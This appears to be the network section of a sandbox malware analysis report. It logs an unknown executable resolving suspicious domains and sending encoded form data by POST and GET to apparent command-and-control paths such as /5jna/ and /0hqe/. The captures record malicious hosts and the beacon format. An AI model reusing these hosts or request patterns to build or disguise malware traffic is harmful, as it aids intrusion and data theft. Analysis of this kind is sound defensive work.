Jan 10, 2025 17:44:48.763644934 CET | 80 | 49985 | 103.120.80.111 | 192.168.2.4
Jan 10, 2025 17:44:48.763731003 CET | 80 | 49985 | 103.120.80.111 | 192.168.2.4
Jan 10, 2025 17:44:48.763757944 CET | 80 | 49985 | 103.120.80.111 | 192.168.2.4
Jan 10, 2025 17:44:48.763772011 CET | 49985 | 80 | 192.168.2.4 | 103.120.80.111
Jan 10, 2025 17:44:48.763792038 CET | 80 | 49985 | 103.120.80.111 | 192.168.2.4
Jan 10, 2025 17:44:48.763832092 CET | 49985 | 80 | 192.168.2.4 | 103.120.80.111
Jan 10, 2025 17:44:48.763869047 CET | 80 | 49985 | 103.120.80.111 | 192.168.2.4
Jan 10, 2025 17:44:48.763911963 CET | 49985 | 80 | 192.168.2.4 | 103.120.80.111
Jan 10, 2025 17:44:48.767796040 CET | 49985 | 80 | 192.168.2.4 | 103.120.80.111
Jan 10, 2025 17:44:48.772557974 CET | 80 | 49985 | 103.120.80.111 | 192.168.2.4
Jan 10, 2025 17:45:10.304584026 CET | 50009 | 80 | 192.168.2.4 | 104.21.80.1
Jan 10, 2025 17:45:10.310501099 CET | 80 | 50009 | 104.21.80.1 | 192.168.2.4
Jan 10, 2025 17:45:10.310586929 CET | 50009 | 80 | 192.168.2.4 | 104.21.80.1
Jan 10, 2025 17:45:10.391254902 CET | 50009 | 80 | 192.168.2.4 | 104.21.80.1
Jan 10, 2025 17:45:10.397313118 CET | 80 | 50009 | 104.21.80.1 | 192.168.2.4
Jan 10, 2025 17:45:11.258136034 CET | 80 | 50009 | 104.21.80.1 | 192.168.2.4
Jan 10, 2025 17:45:11.259059906 CET | 80 | 50009 | 104.21.80.1 | 192.168.2.4
Jan 10, 2025 17:45:11.259165049 CET | 80 | 50009 | 104.21.80.1 | 192.168.2.4
Jan 10, 2025 17:45:11.259241104 CET | 50009 | 80 | 192.168.2.4 | 104.21.80.1
Jan 10, 2025 17:45:11.259241104 CET | 50009 | 80 | 192.168.2.4 | 104.21.80.1
Jan 10, 2025 17:45:11.904285908 CET | 50009 | 80 | 192.168.2.4 | 104.21.80.1
Jan 10, 2025 17:45:12.923059940 CET | 50010 | 80 | 192.168.2.4 | 104.21.80.1
Jan 10, 2025 17:45:12.928024054 CET | 80 | 50010 | 104.21.80.1 | 192.168.2.4
Jan 10, 2025 17:45:12.928152084 CET | 50010 | 80 | 192.168.2.4 | 104.21.80.1
Jan 10, 2025 17:45:12.942863941 CET | 50010 | 80 | 192.168.2.4 | 104.21.80.1
Jan 10, 2025 17:45:12.947994947 CET | 80 | 50010 | 104.21.80.1 | 192.168.2.4
Jan 10, 2025 17:45:13.878002882 CET | 80 | 50010 | 104.21.80.1 | 192.168.2.4
Jan 10, 2025 17:45:13.879365921 CET | 80 | 50010 | 104.21.80.1 | 192.168.2.4
Jan 10, 2025 17:45:13.879499912 CET | 50010 | 80 | 192.168.2.4 | 104.21.80.1
Jan 10, 2025 17:45:14.451137066 CET | 50010 | 80 | 192.168.2.4 | 104.21.80.1
Jan 10, 2025 17:45:15.469611883 CET | 50011 | 80 | 192.168.2.4 | 104.21.80.1
Jan 10, 2025 17:45:15.474509001 CET | 80 | 50011 | 104.21.80.1 | 192.168.2.4
Jan 10, 2025 17:45:15.474642038 CET | 50011 | 80 | 192.168.2.4 | 104.21.80.1
Jan 10, 2025 17:45:15.486999035 CET | 50011 | 80 | 192.168.2.4 | 104.21.80.1
Jan 10, 2025 17:45:15.491929054 CET | 80 | 50011 | 104.21.80.1 | 192.168.2.4
Jan 10, 2025 17:45:15.491946936 CET | 80 | 50011 | 104.21.80.1 | 192.168.2.4
Jan 10, 2025 17:45:15.491972923 CET | 80 | 50011 | 104.21.80.1 | 192.168.2.4
Jan 10, 2025 17:45:15.491986036 CET | 80 | 50011 | 104.21.80.1 | 192.168.2.4
Jan 10, 2025 17:45:15.492008924 CET | 80 | 50011 | 104.21.80.1 | 192.168.2.4
Jan 10, 2025 17:45:15.492019892 CET | 80 | 50011 | 104.21.80.1 | 192.168.2.4
Jan 10, 2025 17:45:15.492034912 CET | 80 | 50011 | 104.21.80.1 | 192.168.2.4
Jan 10, 2025 17:45:15.492089987 CET | 80 | 50011 | 104.21.80.1 | 192.168.2.4
Jan 10, 2025 17:45:15.492104053 CET | 80 | 50011 | 104.21.80.1 | 192.168.2.4
Jan 10, 2025 17:45:16.475223064 CET | 80 | 50011 | 104.21.80.1 | 192.168.2.4
Jan 10, 2025 17:45:16.476088047 CET | 80 | 50011 | 104.21.80.1 | 192.168.2.4
Jan 10, 2025 17:45:16.476128101 CET | 80 | 50011 | 104.21.80.1 | 192.168.2.4
Jan 10, 2025 17:45:16.476145029 CET | 50011 | 80 | 192.168.2.4 | 104.21.80.1
Jan 10, 2025 17:45:16.476200104 CET | 50011 | 80 | 192.168.2.4 | 104.21.80.1
Jan 10, 2025 17:45:16.997899055 CET | 50011 | 80 | 192.168.2.4 | 104.21.80.1
Jan 10, 2025 17:45:18.016839027 CET | 50012 | 80 | 192.168.2.4 | 104.21.80.1
Jan 10, 2025 17:45:18.021933079 CET | 80 | 50012 | 104.21.80.1 | 192.168.2.4
Jan 10, 2025 17:45:18.023339033 CET | 50012 | 80 | 192.168.2.4 | 104.21.80.1
Jan 10, 2025 17:45:18.031637907 CET | 50012 | 80 | 192.168.2.4 | 104.21.80.1
Jan 10, 2025 17:45:18.036442995 CET | 80 | 50012 | 104.21.80.1 | 192.168.2.4
Jan 10, 2025 17:45:18.946753025 CET | 80 | 50012 | 104.21.80.1 | 192.168.2.4
Jan 10, 2025 17:45:18.946773052 CET | 80 | 50012 | 104.21.80.1 | 192.168.2.4
Jan 10, 2025 17:45:18.946952105 CET | 50012 | 80 | 192.168.2.4 | 104.21.80.1
Jan 10, 2025 17:45:18.948493004 CET | 80 | 50012 | 104.21.80.1 | 192.168.2.4
Jan 10, 2025 17:45:18.948563099 CET | 50012 | 80 | 192.168.2.4 | 104.21.80.1
Jan 10, 2025 17:45:18.950109005 CET | 50012 | 80 | 192.168.2.4 | 104.21.80.1
Jan 10, 2025 17:45:18.954870939 CET | 80 | 50012 | 104.21.80.1 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 10, 2025 17:44:22.376305103 CET | 51013 | 53 | 192.168.2.4 | 1.1.1.1
Jan 10, 2025 17:44:22.977864027 CET | 53 | 51013 | 1.1.1.1 | 192.168.2.4
Jan 10, 2025 17:44:38.923894882 CET | 59761 | 53 | 192.168.2.4 | 1.1.1.1
Jan 10, 2025 17:44:39.903786898 CET | 53 | 59761 | 1.1.1.1 | 192.168.2.4
Jan 10, 2025 17:44:53.782757044 CET | 60889 | 53 | 192.168.2.4 | 1.1.1.1
Jan 10, 2025 17:44:53.844286919 CET | 53 | 60889 | 1.1.1.1 | 192.168.2.4
Jan 10, 2025 17:45:10.080867052 CET | 59057 | 53 | 192.168.2.4 | 1.1.1.1
Jan 10, 2025 17:45:10.272468090 CET | 53 | 59057 | 1.1.1.1 | 192.168.2.4
Jan 10, 2025 17:45:24.392380953 CET | 54682 | 53 | 192.168.2.4 | 1.1.1.1
Jan 10, 2025 17:45:24.625715971 CET | 53 | 54682 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 10, 2025 17:44:22.376305103 CET | 192.168.2.4 | 1.1.1.1 | 0x833 | Standard query (0) | www.wuyyv4tq.top | A (IP address) | IN (0x0001) | false
Jan 10, 2025 17:44:38.923894882 CET | 192.168.2.4 | 1.1.1.1 | 0x148d | Standard query (0) | www.313333.xyz | A (IP address) | IN (0x0001) | false
Jan 10, 2025 17:44:53.782757044 CET | 192.168.2.4 | 1.1.1.1 | 0xcd4c | Standard query (0) | www.mosquitoxp.lol | A (IP address) | IN (0x0001) | false
Jan 10, 2025 17:45:10.080867052 CET | 192.168.2.4 | 1.1.1.1 | 0x79b0 | Standard query (0) | www.mzkd6gp5.top | A (IP address) | IN (0x0001) | false
Jan 10, 2025 17:45:24.392380953 CET | 192.168.2.4 | 1.1.1.1 | 0xdbfc | Standard query (0) | www.epayassist.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 10, 2025 17:44:22.977864027 CET | 1.1.1.1 | 192.168.2.4 | 0x833 | No error (0) | www.wuyyv4tq.top | | 156.226.63.13 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 17:44:39.903786898 CET | 1.1.1.1 | 192.168.2.4 | 0x148d | No error (0) | www.313333.xyz | | 103.120.80.111 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 17:44:53.844286919 CET | 1.1.1.1 | 192.168.2.4 | 0xcd4c | No error (0) | www.mosquitoxp.lol | | 127.0.0.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 17:45:10.272468090 CET | 1.1.1.1 | 192.168.2.4 | 0x79b0 | No error (0) | www.mzkd6gp5.top | | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 17:45:10.272468090 CET | 1.1.1.1 | 192.168.2.4 | 0x79b0 | No error (0) | www.mzkd6gp5.top | | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 17:45:10.272468090 CET | 1.1.1.1 | 192.168.2.4 | 0x79b0 | No error (0) | www.mzkd6gp5.top | | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 17:45:10.272468090 CET | 1.1.1.1 | 192.168.2.4 | 0x79b0 | No error (0) | www.mzkd6gp5.top | | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 17:45:10.272468090 CET | 1.1.1.1 | 192.168.2.4 | 0x79b0 | No error (0) | www.mzkd6gp5.top | | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 17:45:10.272468090 CET | 1.1.1.1 | 192.168.2.4 | 0x79b0 | No error (0) | www.mzkd6gp5.top | | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 17:45:10.272468090 CET | 1.1.1.1 | 192.168.2.4 | 0x79b0 | No error (0) | www.mzkd6gp5.top | | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 17:45:24.625715971 CET | 1.1.1.1 | 192.168.2.4 | 0xdbfc | No error (0) | www.epayassist.net | | 208.91.197.27 | A (IP address) | IN (0x0001) | false
• www.wuyyv4tq.top
• www.313333.xyz
• www.mzkd6gp5.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49827 | 156.226.63.13 | 80 | 2056 | C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 17:44:22.998842955 CET | 533 | OUT | GET /0qmw/?3fo=rJKpKBC&h0Z4uv=278+fPNRLmRxSvCH34hbLODYmABWu8vkjuqqbvjl/R4r9MC/xh0rLSqKPcdQtIyz70t8P1XMFdXw2YmeVp9Igz5U6icI9PUQLWv4eV+o4CclGEV4ym29rSk= HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Host: www.wuyyv4tq.top
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
Jan 10, 2025 17:44:23.870687962 CET | 691 | IN | HTTP/1.1 403 Forbidden
Server: nginx
Date: Fri, 10 Jan 2025 16:44:23 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49933 | 103.120.80.111 | 80 | 2056 | C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 17:44:40.060647011 CET | 796 | OUT | POST /5jna/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Host: www.313333.xyz
Origin: http://www.313333.xyz
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 203
Referer: http://www.313333.xyz/5jna/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
                                            Data Raw: 68 30 5a 34 75 76 3d 6c 2b 75 51 46 32 47 61 49 59 5a 56 67 4f 53 49 6c 75 68 39 54 4c 6d 59 49 4d 30 51 4f 54 6f 77 64 70 56 56 62 52 57 76 6c 33 6b 68 44 52 52 59 73 43 52 57 70 65 61 69 50 4c 61 76 78 47 61 38 4b 58 49 42 35 43 4a 69 37 44 43 6c 57 41 4e 68 35 35 62 67 74 4b 65 33 54 6f 48 77 44 57 56 66 32 79 78 44 46 79 46 49 34 61 58 56 52 73 4f 66 58 49 46 4f 4e 46 6b 4f 39 36 44 74 74 7a 76 70 36 59 70 59 6c 48 64 6c 59 61 52 44 74 63 6d 4a 42 70 74 76 6a 50 67 42 6a 68 37 76 63 55 58 4d 6a 6f 34 69 64 6c 63 6c 32 55 6a 61 6c 56 71 76 54 41 33 30 72 2f 37 7a 33 44 4b 64 65 6a 6a 58 70 67 3d 3d
                                            Data Ascii: h0Z4uv=l+uQF2GaIYZVgOSIluh9TLmYIM0QOTowdpVVbRWvl3khDRRYsCRWpeaiPLavxGa8KXIB5CJi7DClWANh55bgtKe3ToHwDWVf2yxDFyFI4aXVRsOfXIFONFkO96Dttzvp6YpYlHdlYaRDtcmJBptvjPgBjh7vcUXMjo4idlcl2UjalVqvTA30r/7z3DKdejjXpg==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49951 | 103.120.80.111 | 80 | 2056 | C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 17:44:42.770786047 CET | 816 | OUT | POST /5jna/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Host: www.313333.xyz
Origin: http://www.313333.xyz
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 223
Referer: http://www.313333.xyz/5jna/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
                                            Data Raw: 68 30 5a 34 75 76 3d 6c 2b 75 51 46 32 47 61 49 59 5a 56 68 75 43 49 6e 4f 64 39 44 62 6d 62 48 73 30 51 42 7a 6f 30 64 75 64 56 62 54 36 5a 6d 46 41 68 44 78 68 59 74 47 39 57 71 65 61 69 46 72 61 71 2b 6d 61 72 4b 58 46 30 35 48 68 69 37 44 47 6c 57 41 64 68 34 49 62 6a 74 61 65 35 61 49 48 79 4d 32 56 66 32 79 78 44 46 79 35 6d 34 63 2f 56 52 63 2b 66 55 71 68 52 45 6c 6b 4e 72 71 44 74 37 7a 76 74 36 59 70 32 6c 43 30 43 59 59 35 44 74 5a 61 4a 42 59 74 6f 74 2f 67 59 73 42 36 49 63 6b 2b 46 6a 4c 64 7a 62 48 38 58 2f 51 58 69 74 7a 6e 31 43 78 57 6a 35 2f 66 41 71 45 44 70 54 67 65 65 79 75 44 63 58 7a 66 72 4b 64 4a 61 64 54 6e 59 52 49 7a 57 35 38 45 3d
                                            Data Ascii: h0Z4uv=l+uQF2GaIYZVhuCInOd9DbmbHs0QBzo0dudVbT6ZmFAhDxhYtG9WqeaiFraq+marKXF05Hhi7DGlWAdh4Ibjtae5aIHyM2Vf2yxDFy5m4c/VRc+fUqhRElkNrqDt7zvt6Yp2lC0CYY5DtZaJBYtot/gYsB6Ick+FjLdzbH8X/QXitzn1CxWj5/fAqEDpTgeeyuDcXzfrKdJadTnYRIzW58E=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49968 | 103.120.80.111 | 80 | 2056 | C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 17:44:45.331123114 CET | 10898 | OUT | POST /5jna/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Host: www.313333.xyz
Origin: http://www.313333.xyz
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 10303
Referer: http://www.313333.xyz/5jna/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
                                            Data Raw: 68 30 5a 34 75 76 3d 6c 2b 75 51 46 32 47 61 49 59 5a 56 68 75 43 49 6e 4f 64 39 44 62 6d 62 48 73 30 51 42 7a 6f 30 64 75 64 56 62 54 36 5a 6d 46 49 68 43 43 70 59 73 6e 39 57 72 65 61 69 47 72 61 72 2b 6d 62 70 4b 58 64 77 35 48 6c 59 37 41 75 6c 58 6a 6c 68 78 64 37 6a 69 61 65 35 59 49 48 2f 44 57 56 47 32 32 64 48 46 7a 56 6d 34 63 2f 56 52 65 57 66 41 6f 46 52 49 46 6b 4f 39 36 44 68 74 7a 76 46 36 59 77 4c 6c 43 77 34 59 6f 5a 44 74 39 47 4a 61 4f 52 6f 72 76 67 4e 6c 52 36 51 63 6b 69 47 6a 4c 42 2f 62 44 31 4b 2f 58 2f 69 76 43 58 6a 52 43 37 31 6c 64 37 6a 36 56 72 36 65 79 57 37 70 39 58 4a 51 52 66 69 56 66 49 32 5a 30 44 55 54 39 36 58 72 62 71 65 48 52 55 45 6b 65 65 49 4c 52 31 77 41 32 42 53 52 38 6f 63 55 58 78 54 6a 52 72 2b 6c 76 5a 6d 53 73 55 4b 69 6a 4a 45 46 71 61 47 4d 63 42 6f 6d 59 30 43 79 77 71 39 62 65 30 4d 63 4a 6c 4b 6b 70 4a 4e 38 2b 56 4e 79 43 4e 43 6d 6e 43 52 65 4d 67 46 72 41 4b 61 78 38 6e 49 6e 32 7a 6d 65 72 4a 54 6f 6a 45 30 64 69 70 66 44 30 4c 77 43 31 4c [TRUNCATED]
Data Ascii: h0Z4uv= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49985 | 103.120.80.111 | 80 | 2056 | C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 17:44:47.872579098 CET | 531 | OUT | GET /5jna/?h0Z4uv=o8GwGASYBJt/nb/piMB5DNiJPc8rJicYda1NcmeQznd2DA1k1E5AtP7RU4WuyFuLPAN95z5B1yv6cgM9wMfZloOraKLvaksg7S1pHUhIybvdcNjqXcBCCD0=&3fo=rJKpKBC HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Host: www.313333.xyz
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
Jan 10, 2025 17:44:48.763370991 CET | 1236 | IN | HTTP/1.1 200 OK
Server: wts/1.7.0
Date: Fri, 10 Jan 2025 16:45:46 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
ETag: "65517fce-1a10"
                                            Data Raw: 31 61 31 61 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 33 31 33 33 33 33 2e 78 79 7a 2d d5 fd d4 da ce f7 b2 bf ca fd c2 eb 28 77 77 77 2e 77 65 73 74 2e 63 6e 29 bd f8 d0 d0 bd bb d2 d7 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 33 31 33 33 33 33 2e 78 79 7a 2c 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e [TRUNCATED]
                                            Data Ascii: 1a1a<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <title>313333.xyz-(www.west.cn)</title> <meta name="description" content="313333.xyz," /> <meta name="keywords" content="313333.xyz," /> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <style> body { line-height: 1.6; background-color: #fff; } body, th, td, button, input, select, textarea { font-family: "Microsoft Yahei", "Hiragino Sans GB", "Helvetica Neue", Helvetica, tahoma, arial, Verdana, sans-serif, "WenQuanYi Micro Hei", "\5B8B\4F53"; font-size: 12px; color: #666; -webkit-font-smoothing: antialiased; -moz-font-smoothing: antialiased; } [TRUNCATED]
                                            Timestamp: Jan 10, 2025 17:44:48.763396025 CET | Bytes transferred: 224 | Direction: IN
                                            Data Ascii: height: 100%; } html, body, h1, h2, h3, h4, h5, h6, hr, p, iframe, dl, dt,
                                            Timestamp: Jan 10, 2025 17:44:48.763413906 CET | Bytes transferred: 1236 | Direction: IN
                                            Data Ascii: dd, ul, ol, li, pre, form, button, input, textarea, th, td, fieldset { margin: 0; padding: 0; }
                                            Timestamp: Jan 10, 2025 17:44:48.763545036 CET | Bytes transferred: 224 | Direction: IN
                                            Data Ascii: : #feff07; font-family: Tahoma, sans-serif; padding: 60px 0 20px 0 } .banner1 p { color: #fff; font-size: 20px; } .d
                                            Timestamp: Jan 10, 2025 17:44:48.763644934 CET | Bytes transferred: 1236 | Direction: IN
                                            Data Ascii: omain-con { padding: 20px 50px; position: relative; } .left { background: #f6f6f6 url(http://domshow.vhostgo.com/template/img/paimai/jiaoyixq_jiaoyi.jpg) no-repeat left top;
                                            Timestamp: Jan 10, 2025 17:44:48.763731003 CET | Bytes transferred: 1236 | Direction: IN
                                            Data Ascii: eight: 56px; line-height: 56px; font-size: 20px; text-align: center } .imgpic { padding: 25px 0 20px 0 } .contact { margin
                                            Timestamp: Jan 10, 2025 17:44:48.763757944 CET | Bytes transferred: 1236 | Direction: IN
                                            Data Ascii: /ykj/view.asp?domain=313333.xyz" class="orangebtn" target="_blank">Buy it !</a></p> </div> </div> <div class="main-out "> <div class="wrap "> <div class="footer-link" id="J_footerLink">
                                            Timestamp: Jan 10, 2025 17:44:48.763792038 CET | Bytes transferred: 260 | Direction: IN
                                            Data Ascii: ipt"); hm.src = "https://hm.baidu.com/hm.js?352bf0fb165ca7ab634d3cea879c7a72"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); </script></body>


                                            Session ID: 5 | Source IP: 192.168.2.4 | Source Port: 50009 | Destination IP: 104.21.80.180 | Destination Port: 80 | PID: 2056 | Process: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe
                                            Timestamp: Jan 10, 2025 17:45:10.391254902 CET | Bytes transferred: 802 | Direction: OUT | Data: POST /0hqe/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate, br
                                            Host: www.mzkd6gp5.top
                                            Origin: http://www.mzkd6gp5.top
                                            Cache-Control: max-age=0
                                            Content-Type: application/x-www-form-urlencoded
                                            Connection: close
                                            Content-Length: 203
                                            Referer: http://www.mzkd6gp5.top/0hqe/
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
                                            Data Ascii: h0Z4uv=OIoVhjzUgo83wISMD9daewR09zJup1xPUlprw6W1prtXnYTPrL3Rg1iQ88fs01gds0vDKoodYmjNNDP6gEaRqQdebCt90iHjVYBijmaDcomJqal1cdVXCweTpcrF4sKLcxiRwtYm0MUm40HQybhnzr88x+k+PXBusFdGw43Y5XSimWaGR0G102yYxm/hDQenqQ==
                                            Timestamp: Jan 10, 2025 17:45:11.258136034 CET | Bytes transferred: 968 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                            Date: Fri, 10 Jan 2025 16:45:11 GMT
                                            Content-Type: text/html
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            cf-cache-status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GOlxFpRyH296IizPNQlSLUy2hO3Pl39IMyl%2FSWzgwbBXYVZr%2BegyCwIvurCcv%2BUDMNN3zUJQyxYuOBW0C1OGxIFttFwy0L%2FDTipon24y9w9FfZ5jZm8g0Yps4tfqvUYUDQP%2F"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8ffe22cdf9d87d0e-EWR
                                            Content-Encoding: gzip
                                            alt-svc: h3=":443"; ma=86400
                                            server-timing: cfL4;desc="?proto=TCP&rtt=2048&min_rtt=2048&rtt_var=1024&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=802&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                            Timestamp: Jan 10, 2025 17:45:11.259059906 CET | Bytes transferred: 5 | Direction: IN
                                            Data Ascii: 0


